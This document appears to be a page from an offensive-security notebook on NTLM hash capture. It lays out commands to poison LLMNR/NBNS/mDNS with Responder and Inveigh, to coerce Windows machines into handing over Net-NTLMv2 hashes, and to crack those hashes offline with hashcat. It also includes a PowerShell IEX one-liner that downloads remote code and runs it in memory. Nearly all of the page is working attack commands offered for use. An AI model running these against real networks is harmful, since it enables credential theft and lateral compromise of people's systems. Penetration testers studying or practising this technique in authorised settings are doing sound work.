NTLM CAPTURE

PRIMARY CATEGORY → NTLM

Theory

An operator could force or coerce a remote machine to authenticate against a rogue server controlled by himself in order to grab the corresponding Net-NTLMv2 hash within the NTLM Message Type 3

Abusing from UNIX-like

Responder

Responder

Setup

git clone https://github.com/lgandx/Responder Responder

cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 Responder.py --interface <INTERFACE>

Abusing from Windows

Inveigh.ps1

Inveight

Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'

Import-Module .\Inveigh.ps1

Usage

Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y

Inveigh.exe

Inveigh.exe

.\Inveigh.exe

Cracking Net-NTLMv2 Hashes

Hashcat

Hashcat

Hashcat Type → 5600

See here

hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST>

hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST> --show

💥Cyb3rBook

Explorer

NTLM CAPTURE

PRIMARY CATEGORY → NTLM

Theory

Abusing from UNIX-like

Responder

Setup

Usage

Abusing from Windows

Inveigh.ps1

Setup

Usage

Inveigh.exe

Cracking Net-NTLMv2 Hashes

Hashcat

Graph View

Table of Contents

Backlinks